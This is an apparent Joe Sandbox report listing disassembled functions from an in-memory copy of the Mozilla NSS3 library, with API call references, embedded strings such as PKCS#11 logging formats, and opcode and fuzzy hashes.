Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin$nvl
API String ID: 1003633598-3097212094
Opcode ID: bfe99debbadc34577481eaa9449d9a29b03fe5a543ab9edf3d75644403d13307
Instruction ID: eaf86b3c7500595d4621aaa909d0bc86905a1b6e84bc0ae3522bf597e31875f7
Opcode Fuzzy Hash: bfe99debbadc34577481eaa9449d9a29b03fe5a543ab9edf3d75644403d13307
Instruction Fuzzy Hash: 6031A275602148AFDB00DF55DE4CE9A3BB2EB4631CF084024ED096BA52DB349958CBBE

Function 6C654AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6C691444,?,?,00000000,?,?), ref: 6C654BD4

Part of subcall function 6C690C90: PR_SetError.NSS3(00000000,00000000,6C691444,?,00000001,?,00000000,00000000,?,?,6C691444,?,?,00000000,?,?), ref: 6C690CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C691444), ref: 6C654B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C654BA5

Part of subcall function 6C6A88E0: TlsGetValue.KERNEL32(00000000,?,?,6C6B08AA,?), ref: 6C6A88F6
Part of subcall function 6C6A88E0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6B08AA,?), ref: 6C6A890B
Part of subcall function 6C6A88E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6C6B08AA,?), ref: 6C6A8936
Part of subcall function 6C6A88E0: PR_Unlock.NSS3(?,?,?,?,?,6C6B08AA,?), ref: 6C6A8940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C654DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6C654B94

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C691444,?), ref: 6C654BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6C654BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C691444), ref: 6C654C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C691444), ref: 6C654C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C654D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C654D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C654DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C654E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C654E6C

Part of subcall function 6C654880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6548A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C654EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C654F02

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID:
API String ID: 24311736-0
Opcode ID: d2dcc7af9955eeab53d72fbeed77f416e13e557aa38ec54f2ae030c930b69309
Instruction ID: a4f015eb0a5a2fc1d726de2541fbfd267446a9fc3284ea2fd9e79bb3a4872d9f
Opcode Fuzzy Hash: d2dcc7af9955eeab53d72fbeed77f416e13e557aa38ec54f2ae030c930b69309
Instruction Fuzzy Hash: FDC160B5E003059FDB00CF69DC80BEE77F8AF49308F644469E815A7701E771E9258BAA

Function 6C6E28C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C6E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6E5B56

TlsGetValue.KERNEL32 ref: 6C6E290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C6E291E
TlsGetValue.KERNEL32 ref: 6C6E2937
EnterCriticalSection.KERNEL32(00000001), ref: 6C6E294B
PR_EnterMonitor.NSS3(?), ref: 6C6E2966
PR_EnterMonitor.NSS3(?), ref: 6C6E29AC
PR_ExitMonitor.NSS3(?), ref: 6C6E29D1
PR_EnterMonitor.NSS3(?), ref: 6C6E29F0
PR_EnterMonitor.NSS3(?), ref: 6C6E2A15
PR_EnterMonitor.NSS3(?), ref: 6C6E2A37
PR_ExitMonitor.NSS3(?), ref: 6C6E2A61
PR_ExitMonitor.NSS3(?), ref: 6C6E2A78
PR_ExitMonitor.NSS3(?), ref: 6C6E2A8F
PR_ExitMonitor.NSS3(?), ref: 6C6E2AA6

Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C71945B
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C719479
Part of subcall function 6C719440: EnterCriticalSection.KERNEL32 ref: 6C719495
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C7194E4
Part of subcall function 6C719440: TlsGetValue.KERNEL32 ref: 6C719532
Part of subcall function 6C719440: LeaveCriticalSection.KERNEL32 ref: 6C71955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C6E2AF9
free.MOZGLUE(?), ref: 6C6E2B16
PR_Unlock.NSS3(?), ref: 6C6E2B6D
PR_Unlock.NSS3(?), ref: 6C6E2B80

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: e70b117de16096f0b0181a1b43c62bc1db1a3bbde59b97bc3b28d193f5af9ba7
Instruction ID: 3c879e4cc254f23c4c28fac0fd7c4411ef04c78e9a626261b209d89e05c741dd
Opcode Fuzzy Hash: e70b117de16096f0b0181a1b43c62bc1db1a3bbde59b97bc3b28d193f5af9ba7
Instruction Fuzzy Hash: B681E5B1A047025BD7209F35EC49B97B7E6AF1530CF044839E85AC3B11EB32E519CB49

Function 6C6A8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8E9E
PORT_ArenaAlloc_Util.NSS3(6C7B0B64,00000001,?,?,?,?,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C6A8E01,00000000,6C6A9060,6C7B0B64), ref: 6C6A8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8E01), ref: 6C6A8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7B0B64,6C7B0B64), ref: 6C6A8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C6A8F3F

Part of subcall function 6C6AA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C6AA421,00000000,00000000,6C6A9826), ref: 6C6AA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6A904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C6A8E76

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: b41af695523b766951f8b3d7dd66e221d047e4c6bbeb62b751c989f09ed93225
Instruction ID: 0a5e921e9643bca006ffd503c695ffcc5610e738b0be403def85a23dd1839119
Opcode Fuzzy Hash: b41af695523b766951f8b3d7dd66e221d047e4c6bbeb62b751c989f09ed93225
Instruction Fuzzy Hash: E66173B5D0010A9BDB10CF96CD44AABB7B5FF88358F244129DC18A7711E732AD16CBB4

Function 6C658E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C658E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C658E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C658EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7818D0,?), ref: 6C658F03
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C658F19
PL_FreeArenaPool.NSS3(?), ref: 6C658F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C658F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C658F65
PL_FinishArenaPool.NSS3(?), ref: 6C658FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C658FFE
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C659012
PL_FreeArenaPool.NSS3(?), ref: 6C659024
PL_FinishArenaPool.NSS3(?), ref: 6C65902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C65903E

Strings

security, xrefs: 6C658EE7

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 537c0f8e005092767397222f4db3d4fbf262e1a1ef082590e7792f1813577c89
Instruction ID: 6727b6f100abf774d9a923c139fa9ad8fe012f12834da34d9ee099564e4fab89
Opcode Fuzzy Hash: 537c0f8e005092767397222f4db3d4fbf262e1a1ef082590e7792f1813577c89
Instruction Fuzzy Hash: E95169B1648300ABD7105A14DC41FAB73E8AF8A35CFA0082EF95497F50E731D829876F

Function 6C71CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C71CC7B), ref: 6C71CD7A

Part of subcall function 6C71CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C68C1A8,?), ref: 6C71CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C71CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C71CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C71CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C71CD8E

Part of subcall function 6C6405C0: PR_EnterMonitor.NSS3 ref: 6C6405D1
Part of subcall function 6C6405C0: PR_ExitMonitor.NSS3 ref: 6C6405EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C71CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C71CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C71CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C71CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C71CE48

Strings

ws2_32.dll, xrefs: 6C71CD75
getnameinfo, xrefs: 6C71CDB2, 6C71CE23
freeaddrinfo, xrefs: 6C71CD9F, 6C71CE10
wship6.dll, xrefs: 6C71CDE3
getaddrinfo, xrefs: 6C71CD88, 6C71CDF9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 524f7c8cace327e20cca65ae3e2fb239c926563253bd2b8b7b8e7d06689f4d6f
Instruction ID: 4de1f8247834431d80a4a036b94170acac42c10d7a72cda8428bdb0db315982c
Opcode Fuzzy Hash: 524f7c8cace327e20cca65ae3e2fb239c926563253bd2b8b7b8e7d06689f4d6f
Instruction Fuzzy Hash: 121126A6E1B12217EB006AB22E01EAA3C5C9B1310EF5CC534E905D2F41FF21D60983EE

Function 6C6C0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,ll), ref: 6C6C0C81

Part of subcall function 6C6ABE30: SECOID_FindOID_Util.NSS3(6C66311B,00000000,?,6C66311B,?), ref: 6C6ABE44

Part of subcall function 6C698500: SECOID_GetAlgorithmTag_Util.NSS3(6C6995DC,00000000,00000000,00000000,?,6C6995DC,00000000,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C698517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6C0CC4

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6C0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6C0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6C0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6C0D7D
free.MOZGLUE(00000000), ref: 6C6C0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6C0DC1
free.MOZGLUE(00000000), ref: 6C6C0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6C0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6C0E0F

Part of subcall function 6C6995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C6995E0
Part of subcall function 6C6995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C6995F5
Part of subcall function 6C6995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C699609
Part of subcall function 6C6995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C69961D
Part of subcall function 6C6995C0: PK11_GetInternalSlot.NSS3 ref: 6C69970B
Part of subcall function 6C6995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C699756
Part of subcall function 6C6995C0: PK11_GetIVLength.NSS3(?), ref: 6C699767
Part of subcall function 6C6995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C69977E
Part of subcall function 6C6995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C69978E

Strings

*,ll, xrefs: 6C6C0C69, 6C6C0DE0, 6C6C0C80, 6C6C0C8B, 6C6C0CAF
*,ll, xrefs: 6C6C0DCC
-$ll, xrefs: 6C6C0C64

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,ll$*,ll$-$ll
API String ID: 3136566230-2285576193
Opcode ID: 8333f21d81759eb397c0448cc2312b2ba086d505cc51359efba5e5f6d111d463
Instruction ID: 989f0a31c556c2584ab16ee8ceb368326daa378d13eb2ffb1eeb58679e14f785
Opcode Fuzzy Hash: 8333f21d81759eb397c0448cc2312b2ba086d505cc51359efba5e5f6d111d463
Instruction Fuzzy Hash: C641C0F1A01246ABEB009F64AC45BEF7AB4EF0530CF104424E91967741E735BA18CBEB

Function 6C686AF0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6C686B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C686B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C686B53

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C686B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6C686B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6C686BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6C686C0A

Strings

pulLastPartLen = 0x%p, xrefs: 6C686B9B
(CK_INVALID_HANDLE), xrefs: 6C686B4C
*pulLastPartLen = 0x%x, xrefs: 6C686C05
C_DecryptFinal, xrefs: 6C686B11
hSession = 0x%x, xrefs: 6C686B2E, 6C686B3E
nvl, xrefs: 6C686BB8, 6C686BE6
pLastPart = 0x%p, xrefs: 6C686B80

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptFinal$nvl
API String ID: 1003633598-3358629004
Opcode ID: 0d12f3fd6d6bc61086f69be38f3193550c90f06bbf49615d69b3925dfe706ad1
Instruction ID: 2a7381e1c8df6179afd1169298b28b742aaf31c608481b498e40c2746e591b26
Opcode Fuzzy Hash: 0d12f3fd6d6bc61086f69be38f3193550c90f06bbf49615d69b3925dfe706ad1
Instruction Fuzzy Hash: A531E471603148AFDB009F55DE8CF8A3BB5EB4231DF084434E909ABA51DB30D918CBAE

Function 6C6B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C781DE0,?), ref: 6C6B6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6B6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C6B6D82
DER_GetInteger_Util.NSS3(?), ref: 6C6B6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6B6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6B6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6B6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C6B6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6B6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6B7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C6B7033
free.MOZGLUE(?), ref: 6C6B703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6B7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6B7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6B70AF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 22b7a8d2ef676f60125aca13eedd16664bc92c3fee75bc7053f74d697f8e4f05
Instruction ID: de297760b8e4570902a3f08134cf0cf4033cff3bd29828cb874390a473a00e34
Opcode Fuzzy Hash: 22b7a8d2ef676f60125aca13eedd16664bc92c3fee75bc7053f74d697f8e4f05
Instruction Fuzzy Hash: 8FA129B19082019BEB188F24DC45B9B33A5DB8130CF244939F919EBB81E775D866C75B

Function 6C67AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67AF39
PR_Unlock.NSS3(?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67AF69
TlsGetValue.KERNEL32 ref: 6C67B06B
EnterCriticalSection.KERNEL32(?), ref: 6C67B083
PR_Unlock.NSS3(?), ref: 6C67B0A4
TlsGetValue.KERNEL32 ref: 6C67B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C67B0D9
PR_Unlock.NSS3 ref: 6C67B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C67B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C67B182

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C67B177

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C65AB95,00000000,?,00000000,00000000,00000000), ref: 6C67B1C2

Part of subcall function 6C6A1560: TlsGetValue.KERNEL32(00000000,?,6C670844,?), ref: 6C6A157A
